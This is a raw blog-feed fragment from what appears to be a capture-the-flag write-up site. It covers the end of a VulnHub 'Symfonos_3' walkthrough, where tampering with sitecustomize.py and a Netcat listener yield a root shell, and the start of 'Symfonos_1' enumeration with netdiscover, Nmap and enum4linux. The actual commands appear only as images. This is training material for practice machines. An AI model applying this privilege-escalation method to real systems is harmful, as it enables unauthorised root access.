src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjJvOlUu72jO62e3jJogvM8LN4vBfNixi88YwFnsV0y_GblNnRjXwQqrUYXad65cuMsD-Uj_tHa0hmWD3QsfDUXoPAZgCZ7UP4VLfnfJb-fUBxrl1T6ZaD8T31WvJ_OUzg9KsujEgnShmOWVawpCjk42nXdEIQNhp1j2JG2TQzDXyLpzysQtj-Ul68j2A=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;-&amp;nbsp;&lt;b&gt;sitecustomize.py&lt;/b&gt; is a Python script that can be adpated to our needs:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiPQoDUDvHt0jI55GwkZLfo1vx4DqfRY-J_iImCDzEfj5VWqFCcDkc_cc4sGvdxT7QLygMLYOWVfpS9GAXm8OGa15TTBzqNFZ3eZvdn4N2eC1CSdO3xsW2Re4yR1kvdj9kL5HlVj6690mYHkYcNdtksrE2hLdKUKGJVGJgF1qFuST4PqXi6JLXjTOTpMw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;187&quot; data-original-width=&quot;632&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiPQoDUDvHt0jI55GwkZLfo1vx4DqfRY-J_iImCDzEfj5VWqFCcDkc_cc4sGvdxT7QLygMLYOWVfpS9GAXm8OGa15TTBzqNFZ3eZvdn4N2eC1CSdO3xsW2Re4yR1kvdj9kL5HlVj6690mYHkYcNdtksrE2hLdKUKGJVGJgF1qFuST4PqXi6JLXjTOTpMw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;p&gt;- Just adding these 3 lines at the beginning of the file:&lt;/p&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjJOmcr52XgUmzyUvlqwwVuA8Z10dItWup5dBB5N4AIcEqm-ZXr1SvMI5jX09OsBaxkMRpKcnOdJN46zzz1pXIFKfTQ9qMjXl_g5tCttFAYAg5jpskC88KdD3H0-QwrfjgOpaL773htLAJkrj4PUFn6nUYlDRElaQWERGhEiGuGZJwhPM_HEsJuJL8p_Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;348&quot; data-original-width=&quot;613&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjJOmcr52XgUmzyUvlqwwVuA8Z10dItWup5dBB5N4AIcEqm-ZXr1SvMI5jX09OsBaxkMRpKcnOdJN46zzz1pXIFKfTQ9qMjXl_g5tCttFAYAg5jpskC88KdD3H0-QwrfjgOpaL773htLAJkrj4PUFn6nUYlDRElaQWERGhEiGuGZJwhPM_HEsJuJL8p_Q=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a Netcat listener:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgjCMGpbDbpJj6nTyVhUBVhCIUa-BMboBngJlIm5pWLFYH6zC-J5x6v4OlKdEnJNLXxdzNbe4rOig_49XRGCbOro9q7-L9spVdGnUobfrix_txRXnj3BpkdyOga3DWi4ddyByL_gUSdP7IPfxiaveHIVxoQRZqWulW0Lhyab8TLGPpx1aV5f0KblpT_HA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;46&quot; data-original-width=&quot;352&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgjCMGpbDbpJj6nTyVhUBVhCIUa-BMboBngJlIm5pWLFYH6zC-J5x6v4OlKdEnJNLXxdzNbe4rOig_49XRGCbOro9q7-L9spVdGnUobfrix_txRXnj3BpkdyOga3DWi4ddyByL_gUSdP7IPfxiaveHIVxoQRZqWulW0Lhyab8TLGPpx1aV5f0KblpT_HA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running &lt;b&gt;sitecustomize.py&lt;/b&gt; we get a root shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjv6qgXq-K_f47aLFnXFanswaxJ_I-li9wa0sxzDttMiW3y58KAen0k-Wxsch4ekYZQgDvoN_RkOcwXgEg1WSlaT5TIYjnX52pteS1RFii9iUnbGj_LymNqvg-CdSMCqHgtS_s1ZGc8UDVkQ7oHpKJsskudbXG3r5GeXRrttnshfHNVasKdmW92G6G48Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;24&quot; data-original-width=&quot;669&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjv6qgXq-K_f47aLFnXFanswaxJ_I-li9wa0sxzDttMiW3y58KAen0k-Wxsch4ekYZQgDvoN_RkOcwXgEg1WSlaT5TIYjnX52pteS1RFii9iUnbGj_LymNqvg-CdSMCqHgtS_s1ZGc8UDVkQ7oHpKJsskudbXG3r5GeXRrttnshfHNVasKdmW92G6G48Q=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhIgRxoThQPQqIkD28saFkK3AaJNGnaa6pxbMvjjYnoTxq95xxaU03j8OLjvbHLydtWVxtBXWOsAU1niKKDuu0fA1J8-QyQt_jmUyml_y_q-4ZBnZ6NIttqkBjmgxl4JtEtyeTemENqU5bBqSCgb10l-emEBV5YnSijdW-whp6SkfSw1h8RiXfoXIDjzA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;163&quot; data-original-width=&quot;685&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhIgRxoThQPQqIkD28saFkK3AaJNGnaa6pxbMvjjYnoTxq95xxaU03j8OLjvbHLydtWVxtBXWOsAU1niKKDuu0fA1J8-QyQt_jmUyml_y_q-4ZBnZ6NIttqkBjmgxl4JtEtyeTemENqU5bBqSCgb10l-emEBV5YnSijdW-whp6SkfSw1h8RiXfoXIDjzA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - CAPTURING THE FLAG&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;proof.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi2-XsmM9xXqCM8kw5UtiY2S_UBBltMWGl7pAoyh1GtfatuB3qA_up1oSucf1jcwor2WS4wbLdKdvVFhX4XaIK-UGb3Jel_oYvkOd5WCRIt__70T5vm_275mEnJpUGyP4380hpXPHiVVCKm5KIvB1w9-pdLcPJEEHhabkbQAd4HndZG1nyrS_UQarq7sw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;625&quot; data-original-width=&quot;815&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi2-XsmM9xXqCM8kw5UtiY2S_UBBltMWGl7pAoyh1GtfatuB3qA_up1oSucf1jcwor2WS4wbLdKdvVFhX4XaIK-UGb3Jel_oYvkOd5WCRIt__70T5vm_275mEnJpUGyP4380hpXPHiVVCKm5KIvB1w9-pdLcPJEEHhabkbQAd4HndZG1nyrS_UQarq7sw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/6149029442648619938'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/6149029442648619938'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/symfonos3.html' title='Symfonos_3'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEg7URSg-0LMkVPPU9ub-zp3WWXueRzqJrvcPFDL80zGF3KkGsS0oO9H-HUNdAFQVtPqWXLhEDZhdFJr2BlgKnJHrkcLgmRQwqT9U3VCH8if6W3VTO4ks65q3qz98eQIVcbHgJQBCdpsO6ZuzSgvc8o6boGUk75V4451Cd-T_VQjsEldPcK_gGCYDLMgFQ=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-193756961884008845</id><published>2022-02-10T12:39:00.000-06:00</published><updated>2022-02-19T13:39:28.181-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Symfonos_1</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial;&quot;&gt;SYMFONOS_1&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhjZIl_JB0Nns-hwjRUspyddC29kR7JbsdT4J8TJQHN0s0KV5bcjCJkcLLdag3_h8cULqXTMN5X4X9FtrG7rHVeIM-D1xObcTEPd8xyen58AA1fnmZnpcrQmn8yoxNzjgK2XI0fHUjePo0cfIoxUTkNSj7l3Z-XFDeOs6NpklNqYHGh6WjNTrHOJ2_NnQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;243&quot; data-original-width=&quot;621&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhjZIl_JB0Nns-hwjRUspyddC29kR7JbsdT4J8TJQHN0s0KV5bcjCJkcLLdag3_h8cULqXTMN5X4X9FtrG7rHVeIM-D1xObcTEPd8xyen58AA1fnmZnpcrQmn8yoxNzjgK2XI0fHUjePo0cfIoxUTkNSj7l3Z-XFDeOs6NpklNqYHGh6WjNTrHOJ2_NnQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;1 - INTRODUCTION&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp;- The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;Symfonos_1&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;-&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;S&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;ymfonos_1&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;can be downloaded from here:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/symfonos-1,322/&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;https://www.vulnhub.com/entry/symfonos-1,322/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;- Once the virtual machine downloaded and extracted with VirtualBox:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhwABZxAJieuPVd9gB2axfh6Nbqep4DbdoCicP3D-Omz0YYRo3BIArJRdoodBLuHc8eQb7k8pyYovLpwlth-2Z7ruEiqZvyIgG8Ht3hpvz8NgbBXcNFN3DhR22kKIG48elpTLTf35A_5itPNoiNHyf1ZfLLfB2NR_qAH2sK-dpHIbaB38oDRaediwiIZA&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;155&quot; data-original-width=&quot;294&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhwABZxAJieuPVd9gB2axfh6Nbqep4DbdoCicP3D-Omz0YYRo3BIArJRdoodBLuHc8eQb7k8pyYovLpwlth-2Z7ruEiqZvyIgG8Ht3hpvz8NgbBXcNFN3DhR22kKIG48elpTLTf35A_5itPNoiNHyf1ZfLLfB2NR_qAH2sK-dpHIbaB38oDRaediwiIZA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;2 - ENUMERATION&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Discovering IP 192.168.1.35 with netdiscover:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgQTwnOEz4ltq1jw7kq-a0F3F5FacpApP3KdPD9sebRm-ZVlPTq5TWQiC4ekBkUa-OtrWwIG4kvATCHsueIHdBC694kZ8e9Mx8QvAECfW_hHh4bdFn28QXth4s68x1TnL9bWg1w-Ee8eFReHeDdWb20N6kp6znUvoYfc8P4qjQ-ExvTR5G3GCAV83yAGQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;426&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgQTwnOEz4ltq1jw7kq-a0F3F5FacpApP3KdPD9sebRm-ZVlPTq5TWQiC4ekBkUa-OtrWwIG4kvATCHsueIHdBC694kZ8e9Mx8QvAECfW_hHh4bdFn28QXth4s68x1TnL9bWg1w-Ee8eFReHeDdWb20N6kp6znUvoYfc8P4qjQ-ExvTR5G3GCAV83yAGQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgq3J6dFhzgILRQGkuYXuiCECq1Qu5A2WF65xTRdg1eMtpMLOmg3brffgXlQwAMIvTNehAb6yAbjROyiUs5sPtT0ZfCUsYhg0Qs7LGOZ-Y2VSpTN-wOUCtI39XVlcmL8UBRIMuEZf_0NS_hamLEH690nYq5E-5hwylUcdG75dxZSKkLC4HeFpdG7g32lA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;207&quot; data-original-width=&quot;853&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgq3J6dFhzgILRQGkuYXuiCECq1Qu5A2WF65xTRdg1eMtpMLOmg3brffgXlQwAMIvTNehAb6yAbjROyiUs5sPtT0ZfCUsYhg0Qs7LGOZ-Y2VSpTN-wOUCtI39XVlcmL8UBRIMuEZf_0NS_hamLEH690nYq5E-5hwylUcdG75dxZSKkLC4HeFpdG7g32lA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning ports with Nmap:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg8I4wbtmJS7BUs2G2oluD5AJ_R_t4V9RhDGHqfNvzLXE2iM-neHoJ8xOSi6M4OqPILiz8QQ9KoynEoYWMJ02nCv-zkceMQ_gHSgx40Ap5sm6FOyinKMlL5PfnfvMQtUp7k8nPv7pfZBKyLPhqLTNlj9zMyhadwBKXtOlK7eOmXqbNQNhVEsDk1uFpgYA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;287&quot; data-original-width=&quot;437&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg8I4wbtmJS7BUs2G2oluD5AJ_R_t4V9RhDGHqfNvzLXE2iM-neHoJ8xOSi6M4OqPILiz8QQ9KoynEoYWMJ02nCv-zkceMQ_gHSgx40Ap5sm6FOyinKMlL5PfnfvMQtUp7k8nPv7pfZBKyLPhqLTNlj9zMyhadwBKXtOlK7eOmXqbNQNhVEsDk1uFpgYA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Enumerating with &lt;b&gt;enum4linux&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; 